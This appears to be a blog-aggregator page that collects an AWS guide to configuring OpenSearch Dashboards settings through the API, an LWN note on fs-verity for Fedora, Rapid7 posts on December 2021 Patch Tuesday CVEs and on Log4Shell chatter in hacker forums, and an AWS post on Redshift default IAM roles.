{"id":"1.0.0-SNAPSHOT","type":"config","updated_at":"2021-09-06T19:59:42.425Z","version":"WzcsMV0=","namespaces":["default"],"attributes":{"dateFormat:tz":"US/Eastern"}}

If you prefer to make multiple changes, you can construct the API call as follows:

curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-d \
'{
    "attributes":{
      "dateFormat:tz":"US/Eastern",
      "dateFormat:dow":"Monday"
    }
 }' \
-b auth.txt

To retrieve the latest configuration changes, construct a GET request as follows:

curl -X GET https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-b auth.txt

Configure advanced settings with the OpenSearch Dashboards API in multi-tenant environments

Tenants in OpenSearch Dashboards are commonly used to share custom index patterns, visualizations, dashboards, and other OpenSearch objects with different teams or organizations.

The OpenSearch Dashboards API provides the ability to modify advanced settings in different tenants. In the previous section, we covered making advanced configuration changes for a private tenant. We now walk through a similar scenario for multiple tenants.

  1. First, you need to authenticate to the API endpoint and retrieve the authorization cookies into the file auth.txt. You can construct this request in the same way you would in a single-tenant environment as described in the previous section.

In multi-tenant environments, make sure you configure the user’s role with relevant tenant permissions. One pattern is to associate the user to the kibana_user and a custom group that has tenant permissions. In our example, we associated the tenant admin user tenant-a_admin_user to the two roles as shown in the following code: the kibana_user system role and a custom tenant-a_admin_role that includes tenant permissions.

GET _plugins/_security/api/account
{
  "user_name" : "tenant-a_admin_user",
  "is_reserved" : false,
  "is_hidden" : false,
  "is_internal_user" : true,
  "user_requested_tenant" : "tenant-a",
  "backend_roles" : [
    ""
  ],
  "custom_attribute_names" : [ ],
  "tenants" : {
    "global_tenant" : true,
    "tenant-a_admin_user" : true,
    "tenant-a" : true
  },
  "roles" : [
    "tenant-a_admin_role",
    "kibana_user"
  ]
}


GET _plugins/_security/api/roles/tenant-a_admin_role
{
  "tenant-a_admin_role" : {
    "reserved" : false,
    "hidden" : false,
    "cluster_permissions" : [ ],
    "index_permissions" : [ ],
    "tenant_permissions" : [
      {
        "tenant_patterns" : [
          "tenant-a"
        ],
        "allowed_actions" : [
          "kibana_all_write"
        ]
      }
    ],
    "static" : false
  }
}

After authenticating to the OpenSearch Dashboards API, the auth.txt file holds authorization cookies that you use to pass configuration changes to the API endpoint. The content of the auth.txt file should be similar to the one we illustrated in the previous section.

  1. Construct the configuration changes by adding a securitytenant header. In this example, we modify the time zone and day of week in tenant-a:
curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-H "securitytenant: tenant-a" \
-d \
'{
    "attributes":{
     "dateFormat:tz":"US/Eastern",
     "dateFormat:dow":"Monday"
    }
 }' \
-b auth.txt

The OpenSearch Dashboards API endpoint returns a response similar to the following:

{"id":"1.0.0-SNAPSHOT","type":"config","updated_at":"2021-10-10T17:41:47.249Z","version":"WzEsMV0=","namespaces":["default"],"attributes":{"dateFormat:tz":"US/Eastern","dateFormat:dow":"Monday"}}

You could also verify the configuration changes in the OpenSearch Dashboards UI, as shown in the following screenshot.

Conclusion

In this post, you used the Amazon OpenSearch Service Dashboards UI and API to configure advanced settings for a single-tenant and multi-tenant environment. Implementing OpenSearch Dashboards at scale in multi-tenant environments requires more efficient methods than simply using the UI. This is especially important in environments where you serve centralized logging and monitoring domains for different teams. You can use the OpenSearch Dashboards APIs we illustrated in this post and bake your advanced setting configurations into your infrastructure code to accelerate your deployments!

Let us know about your questions and other topics you’d like us to cover in the comment section.


About the Authors

Prashant Agrawal is a Specialist Solutions Architect at Amazon Web Services based in Seattle, WA.. Prashant works closely with Amazon OpenSearch team, helping customers migrate their workloads to the AWS Cloud. Before joining AWS, Prashant helped various customers use Elasticsearch for their search and analytics use cases.

Evren Sen is a Solutions Architect at AWS, focusing on strategic financial services customers. He helps his customers create Cloud Center of Excellence and design, and deploy solutions on the AWS Cloud. Outside of AWS, Evren enjoys spending time with family and friends, traveling, and cycling.

[$] Adding fs-verity support for Fedora 36?

Post Syndicated from original https://lwn.net/Articles/878281/rss

Adding fs-verity file-integrity information
to RPM packages for Fedora 36 is the
topic of a recent discussion on the Fedora devel mailing list. The feature
would provide a means to install files from RPM packages as read-only files
that cannot be read or otherwise operated on if the data in the files changes
at any point. The proposal is mostly about making the plumbing available
for use cases that are not particularly clear—which has led to some
questions and skepticism among those participating in the thread.

Patch Tuesday – December 2021

Post Syndicated from Greg Wiseman original https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/

Patch Tuesday - December 2021

This month’s Patch Tuesday comes in the middle of a global effort to mitigate Apache Log4j CVE-2021-44228. In today’s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products — including a fix for Windows Defender for IoT, which is vulnerable to CVE-2021-44228 amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month’s release is CVE-2021-43890, a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.

Interestingly, this round of fixes also includes CVE-2021-43883, a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there’s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for a zero-day vulnerability that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7’s vulnerability research team did a full root cause analysis of the bug as attacks ramped up in November.

As usual, RCE flaws figure prominently in the “Critical”-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. Past that, put critical server-side and OS RCE patches at the top of your list, and we’d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating.

Summary charts

Patch Tuesday - December 2021
Patch Tuesday - December 2021
Patch Tuesday - December 2021
Patch Tuesday - December 2021

Summary tables

Apps Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43890 Windows AppX Installer Spoofing Vulnerability Yes Yes 7.1 Yes
CVE-2021-43905 Microsoft Office app Remote Code Execution Vulnerability No No 9.6 Yes

Browser Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-4068 Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page No No N/A Yes
CVE-2021-4067 Chromium: CVE-2021-4067 Use after free in window manager No No N/A Yes
CVE-2021-4066 Chromium: CVE-2021-4066 Integer underflow in ANGLE No No N/A Yes
CVE-2021-4065 Chromium: CVE-2021-4065 Use after free in autofill No No N/A Yes
CVE-2021-4064 Chromium: CVE-2021-4064 Use after free in screen capture No No N/A Yes
CVE-2021-4063 Chromium: CVE-2021-4063 Use after free in developer tools No No N/A Yes
CVE-2021-4062 Chromium: CVE-2021-4062 Heap buffer overflow in BFCache No No N/A Yes
CVE-2021-4061 Chromium: CVE-2021-4061 Type Confusion in V8 No No N/A Yes
CVE-2021-4059 Chromium: CVE-2021-4059 Insufficient data validation in loader No No N/A Yes
CVE-2021-4058 Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE No No N/A Yes
CVE-2021-4057 Chromium: CVE-2021-4057 Use after free in file API No No N/A Yes
CVE-2021-4056 Chromium: CVE-2021-4056: Type Confusion in loader No No N/A Yes
CVE-2021-4055 Chromium: CVE-2021-4055 Heap buffer overflow in extensions No No N/A Yes
CVE-2021-4054 Chromium: CVE-2021-4054 Incorrect security UI in autofill No No N/A Yes
CVE-2021-4053 Chromium: CVE-2021-4053 Use after free in UI No No N/A Yes
CVE-2021-4052 Chromium: CVE-2021-4052 Use after free in web apps No No N/A Yes

Developer Tools Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43907 Visual Studio Code WSL Extension Remote Code Execution Vulnerability No No 9.8 No
CVE-2021-43908 Visual Studio Code Spoofing Vulnerability No No nan No
CVE-2021-43891 Visual Studio Code Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43896 Microsoft PowerShell Spoofing Vulnerability No No 5.5 No
CVE-2021-43892 Microsoft BizTalk ESB Toolkit Spoofing Vulnerability No No 7.4 No
CVE-2021-43225 Bot Framework SDK Remote Code Execution Vulnerability No No 7.5 No
CVE-2021-43877 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability No No 7.8 No

Device Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability No No 9.8 Yes

Microsoft Office Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-42295 Visual Basic for Applications Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-42320 Microsoft SharePoint Server Spoofing Vulnerability No No 8 Yes
CVE-2021-43242 Microsoft SharePoint Server Spoofing Vulnerability No No 7.6 No
CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42294 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.2 Yes
CVE-2021-43255 Microsoft Office Trust Center Spoofing Vulnerability No No 5.5 Yes
CVE-2021-43875 Microsoft Office Graphics Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-42293 Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability No No 6.5 Yes
CVE-2021-43256 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes

System Center Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 9 Yes
CVE-2021-42311 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42313 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42314 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42315 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-41365 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.1 Yes
CVE-2021-43889 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 7.2 Yes
CVE-2021-43888 Microsoft Defender for IoT Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-42312 Microsoft Defender for IOT Elevation of Privilege Vulnerability No No 7.8 Yes

Windows Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43247 Windows TCP/IP Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43239 Windows Recovery Environment Agent Elevation of Privilege Vulnerability No No 7.1 No
CVE-2021-43231 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43880 Windows Mobile Device Management Elevation of Privilege Vulnerability No Yes 5.5 Yes
CVE-2021-43244 Windows Kernel Information Disclosure Vulnerability No No 6.5 Yes
CVE-2021-43246 Windows Hyper-V Denial of Service Vulnerability No No 5.6 No
CVE-2021-43232 Windows Event Tracing Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43248 Windows Digital Media Receiver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43214 Web Media Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-43243 VP9 Video Extensions Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43228 SymCrypt Denial of Service Vulnerability No No 7.5 No
CVE-2021-43227 Storage Spaces Controller Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43235 Storage Spaces Controller Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43240 NTFS Set Short Name Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-40452 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-40453 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-41360 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-43219 DirectX Graphics Kernel File Denial of Service Vulnerability No No 7.4 No

Windows ESU Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43215 iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution No No 9.8 Yes
CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43223 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-41333 Windows Print Spooler Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-43229 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43230 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-40441 Windows Media Center Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43883 Windows Installer Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-43234 Windows Fax Service Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability No No 8.1 Yes
CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability No Yes 7.5 No
CVE-2021-43245 Windows Digital TV Tuner Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43224 Windows Common Log File System Driver Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43226 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43207 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43233 Remote Desktop Client Remote Code Execution Vulnerability No No 7.5 No
CVE-2021-43222 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-43236 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-43216 Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability No No 6.5 Yes

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

It’s been a long few days as organizations’ security teams have worked to map, quantify, and mitigate the immense risk presented by the Log4Shell vulnerability within Log4j. As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.

Need clarity on detecting and mitigating Log4Shell?

Sign up for our webinar on Thursday, December 16, 2021

The Rapid7 Threat Intelligence team is tracking the attacker’s-eye view and the related chatter on the clear, deep, and dark web within our Threat Intelligence platform. Here are 4 observations based on what we’ve seen at the onset of the identification of CVE-2021-44228.

1. We see a spike in hacker chatter and security researchers’ publications about Log4j.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

Increased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise – however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what’s on the horizon.

2. Hackers – specifically from the Russian, Chinese, and Turkish communities – show interest in the vulnerability and are actively sharing scanners and exploits.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

The following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4Shell discussion on a Russian cybercrime forum
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4j discussion on a Turkish cybercrime forum

3. Code with a proof of concept for the exploit has been published on GitHub.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

The underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.

4. Various scanners were published on GitHub to identify vulnerable systems.

Scanners are the cybercriminal’s tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company — regardless of size — can be a target.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4j Scanner Discussion on Reddit
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
A fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts

While others look inside, we look outside

The bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.

Read more about the Log4Shell vulnerability within Log4j, and what your team can do in response.

Use the default IAM role in Amazon Redshift to simplify accessing other AWS services

Post Syndicated from Nita Shah original https://aws.amazon.com/blogs/big-data/use-the-default-iam-role-in-amazon-redshift-to-simplify-accessing-other-aws-services/

Amazon Redshift is a fast, scalable, secure, and fully managed cloud data warehouse that makes it simple and cost-effective to analyze all your data using standard SQL. Amazon Redshift offers up to three times better price performance than any other cloud data warehouse, and can expand to petabyte scale. Today, tens of thousands of AWS customers use Amazon Redshift to run mission-critical business intelligence dashboards, analyze real-time streaming data, and run predictive analytics jobs.

Many features in Amazon Redshift access other services, for example, when loading data from Amazon Simple Storage Service (Amazon S3). This requires you to create an AWS Identity and Access Management (IAM) role and grant that role to the Amazon Redshift cluster. Historically, this has required some degree of expertise to set up access configuration with other AWS services. For details about IAM roles and how to use them, see Create an IAM role for Amazon Redshift.

This post discusses the introduction of the default IAM role, which simplifies the use of other services such as Amazon S3, Amazon SageMaker, AWS Lambda, Amazon Aurora, and AWS Glue by allowing you to create an IAM role from the Amazon Redshift console and assign it as the default IAM role to new or existing Amazon Redshift cluster. The default IAM role simplifies SQL operations that access other AWS services (such as COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY) by eliminating the need to specify the Amazon Resource Name (ARN) for the IAM role.

Overview of solution

The Amazon Redshift SQL commands for COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY historically require the role ARN to be passed as an argument. Usually, these roles and accesses are set up by admin users. Most data analysts and data engineers using these commands aren’t authorized to view cluster authentication details. To eliminate the need to specify the ARN for the IAM role, Amazon Redshift now provides a new managed IAM policy AmazonRedshiftAllCommandsFullAccess, which has required privileges to use other related services such as Amazon S3, SageMaker, Lambda, Aurora, and AWS Glue. This policy is used for creating the default IAM role via the Amazon Redshift console. End-users can use the default IAM role by specifying IAM_ROLE with the DEFAULT keyword. When you use the Amazon Redshift console to create IAM roles, Amazon Redshift keeps track of all IAM roles created and preselects the most recent default role for all new cluster creations and restores from snapshots.

The Amazon Redshift default IAM role simplifies authentication and authorization with the following benefits:

  • It allows users to run SQL commands without providing the IAM role’s ARN
  • It avoids the need to use multiple AWS Management Console pages to create the Amazon Redshift cluster and IAM role
  • You don’t need to reconfigure default IAM roles every time Amazon Redshift introduces a new feature, which requires additional permission, because Amazon Redshift can modify or extend the AWS managed policy, which is attached to the default IAM role, as required

To demonstrate this, first we create an IAM role through the Amazon Redshift console that has a policy with permissions to run SQL commands such as COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY. We also demonstrate how to make an existing IAM role the default role, and remove a role as default. Then we show you how to use the default role with various SQL commands, and how to restrict access to the role.

Create a new cluster and set up the IAM default role

The default IAM role is supported in both Amazon Redshift clusters and Amazon Redshift Serverless (preview). To create a new cluster and configure our IAM role as the default role, complete the following steps:

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.

This page lists the clusters in your account in the current Region. A subset of properties of each cluster is also displayed.

  1. Choose Create cluster.
  2. Follow the instructions to enter the properties for cluster configuration.
  3. If you know the required size of your cluster (that is, the node type and number of nodes), choose I’ll choose.
  4. Choose the node type and number of nodes.

If you don’t know how large to size your cluster, choose Help me choose. Doing this starts a sizing calculator that asks you questions about the size and query characteristics of the data that you plan to store in your data warehouse.

  1. Follow the instructions to enter properties for database configurations.
  2. Under Associated IAM roles, on the Manage IAM roles menu, choose Create IAM role.
  3. To specify an S3 bucket for the IAM role to access, choose one of the following methods:
    1. Choose No additional S3 bucket to create the IAM role without specifying specific S3 buckets.
    2. Choose Any S3 bucket to allow users that have access to your Amazon Redshift cluster to also access any S3 bucket and its contents in your AWS account.
    3. Choose Specific S3 buckets to specify one or more S3 buckets that the IAM role being created has permission to access. Then choose one or more S3 buckets from the table.
  4. Choose Create IAM role as default.

Amazon Redshift automatically creates and sets the IAM role as the default for your cluster.

  1. Choose Create cluster to create the cluster.

The cluster might take several minutes to be ready to use. You can verify the new default IAM role under Cluster permissions.

You can only have one IAM role set as the default for the cluster. If you attempt to create another IAM role as the default for the cluster when an existing IAM role is currently assigned as the default, the new IAM role replaces the other IAM role as default.

Make an existing IAM role the default for your new or existing cluster

You can also attach your existing role to the cluster and make it default IAM role for more granular control of permissions with customized managed polices.

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.
  2. Choose the cluster you want to associate IAM roles with.
  3. Under Associated IAM roles, on the Manage IAM roles menu, choose Associated IAM roles.
  4. Select an IAM role that you want make the default for the cluster.
  5. Choose Associate IAM roles.
  6. Under Associated IAM roles, on the Set default menu, choose Make default.
  7. When prompted, choose Set default to confirm making the specified IAM role the default.
  8. Choose Confirm.

Your IAM role is now listed as default.

Make an IAM role no longer default for your cluster

You can make an IAM role no longer the default role by changing the cluster permissions.

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.
  2. Choose the cluster that you want to associate IAM roles with.
  3. Under Associated IAM roles, select the default IAM role.
  4. On the Set default menu, choose Clear default.
  5. When prompted, choose Clear default to confirm.

Use the default IAM role to run SQL commands

Now we demonstrate how to use the default IAM role in SQL commands like COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, and CREATE MODEL using Amazon Redshift ML.

To run SQL commands, we use Amazon Redshift Query Editor V2, a web-based tool that you can use to explore, analyze, share, and collaborate on data stored on Amazon Redshift. It supports data warehouses on Amazon Redshift and data lakes through Amazon Redshift Spectrum. However, you can use the default IAM role with any tools of your choice.

For additional information, see Introducing Amazon Redshift Query Editor V2, a Free Web-based Query Authoring Tool for Data Analysts.

First verify the cluster is using the default IAM role, as shown in the following screenshot.

Load data from Amazon S3

The SQL in the following screenshot describes how to load data from Amazon S3 using the default IAM role.

Unload data to Amazon S3

With an Amazon Redshift lake house architecture, you can query data in your data lake and write data back to your data lake in open formats using the UNLOAD command. After the data files are in Amazon S3, you can share the data with other services for further processing.

The SQL in the following screenshot describes how to unload data to Amazon S3 using the default IAM role.

Create an ML model

Redshift ML enables SQL users to create, train, and deploy machine learning (ML) models using familiar SQL commands. The SQL in the following screenshot describes how to build an ML model using the default IAM role. We use the Iris dataset from the UCI Machine Learning Repository.

Create an external schema and external table

Redshift Spectrum is a feature of Amazon Redshift that allows you to perform SQL queries on data stored in S3 buckets using external schema and external tables. This eliminates the need to move data from a storage service to a database, and instead directly queries data inside an S3 bucket. Redshift Spectrum also expands the scope of a given query because it extends beyond a user’s existing Amazon Redshift data warehouse nodes and into large volumes of unstructured S3 data lakes.

The following SQL describes how to use the default IAM role in the CREATE EXTERNAL SCHEMA command. For more information, see Querying external data using Amazon Redshift Spectrum

The default IAM role requires redshift as part of the catalog database name or resources tagged with the Amazon Redshift service tag due to security considerations. You can customize the policy attached to default role as per your security requirement. In the following example, we use the AWS Glue Data Catalog name redshift_data.

Restrict access to the default IAM role

To control access privileges of the IAM role created and set it as default for your Amazon Redshift cluster, use the ASSUMEROLE privilege. This access control applies to database users and groups when they run commands such as COPY and UNLOAD. After you grant the ASSUMEROLE privilege to a user or group for the IAM role, the user or group can assume that role when running these commands. With the ASSUMEROLE privilege, you can grant access to the appropriate commands as required.

Best practices

Amazon Redshift uses the AWS security frameworks to implement industry-leading security in the areas of authentication, access control, auditing, logging, compliance, data protection, and network security. For more information, refer to Security in Amazon Redshift and Security best practices in IAM.

Conclusion

This post showed you how the default IAM role simplifies SQL operations that access other AWS services by eliminating the need to specify the ARN for the IAM role. This new functionality helps make Amazon Redshift easier than ever to use, and reduces reliance on an administrator to wrangle these permissions.

As an administrator, you can start using the default IAM role to grant IAM permissions to your Redshift cluster and allow your end-users such as data analysts and developers to use default IAM role with their SQL commands without having to provide the ARN for the IAM role.


About the Authors

Nita Shah is an Analytics Specialist Solutions Architect at AWS based out of New York. She has been building data warehouse solutions for over 20 years and specializes in Amazon Redshift. She is focused on helping customers design and build enterprise-scale well-architected analytics and decision support platforms.

Evgenii Rublev is a Software Development Engineer on the AWS Redshift team. He has worked on building end-to-end applications for over 10 years. He is passionate about innovations in building high-availability and high-performance applications to drive a better customer experience. Outside of work, Evgenii enjoys spending time with his family, traveling, and reading books.

Debu Panda, a Principal Product Manager at AWS, is an industry leader in analytics, application platform, and database technologies, and has more than 25 years of experience in the IT world. Debu has published numerous articles on analytics, enterprise Java, and databases and has presented at multiple conferences such as re:Invent, Oracle Open World, and Java One. He is lead author of the EJB 3 in Action (Manning Publications 2007, 2014) and Middleware Management (Packt).

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close